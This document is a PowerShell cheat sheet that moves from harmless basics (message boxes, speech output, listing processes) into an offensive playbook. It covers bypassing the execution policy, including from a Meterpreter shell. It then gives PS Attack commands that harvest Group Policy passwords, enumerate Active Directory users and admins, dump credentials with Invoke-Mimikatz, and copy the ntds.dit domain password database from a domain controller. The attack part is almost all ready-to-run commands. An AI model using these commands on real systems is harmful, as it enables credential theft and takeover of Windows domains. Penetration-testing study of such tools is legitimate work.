PowerShell
Write-Host 'Hello World!'
Get-Command # Show all commands.
Get-Content
Get-Eventlog system
Get-Process # Show current running processes.
Set-Content
------------------------------------------------------------------------------------------------------
# Pop-up window
[System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
[System.Windows.Forms.MessageBox]::Show("<message>" , "<window title>" , <button option>)
Example:
[System.Windows.Forms.MessageBox]::Show("Hello World!" , "Important Message" , 1)
Button options (third argument):
0 OK
1 OK, Cancel
2 Abort, Retry, Ignore
3 Yes, No, Cancel
4 Yes, No
5 Retry, Cancel
------------------------------------------------------------------------------------------------------
# Speak
(New-Object -ComObject SAPI.SPVoice).Speak("Hello World!")
------------------------------------------------------------------------------------------------------
# Error message
The file cannot be loaded because the execution of scripts is disabled on this system. Bypass it for a single invocation:
powershell.exe -executionpolicy bypass -file <file>
Use the same command to run a file remotely on a Windows system from an active Meterpreter shell.
------------------------------------------------------------------------------------------------------
# PS Attack
Get-GPPPassword
get-attack "active directory"
get-help Get-NetUser
Get-NetUser -UserName <user>
get-attack groups
get-help Get-NetLocalGroup
Get-NetLocalGroup -GroupName "Administrators"
---------------------------------------------------------
Restart PS Attack and run it as a local Administrator user.
get-attack "local admin"
Find-LocalAdminAccess
get-attack find
get-help Invoke-UserHunter
Invoke-UserHunter -Examples
Invoke-UserHunter -CheckAccess
Get-Attack mimi
get-help Invoke-Mimikatz
Invoke-Mimikatz -ComputerName <target> -DumpCreds
---------------------------------------------------------
Restart PS Attack and run it as a Domain Admin.
get-attack "domain controller"
Get-NetDomainController
get-attack copy
get-help Invoke-NinjaCopy -Examples
Invoke-NinjaCopy -Path "C:\windows\ntds\ntds.dit" -ComputerName <target> -LocalDestination "C:\ntds.dit"
(this takes a little while)
ls
---------------------------------------------------------
PS Attack build tool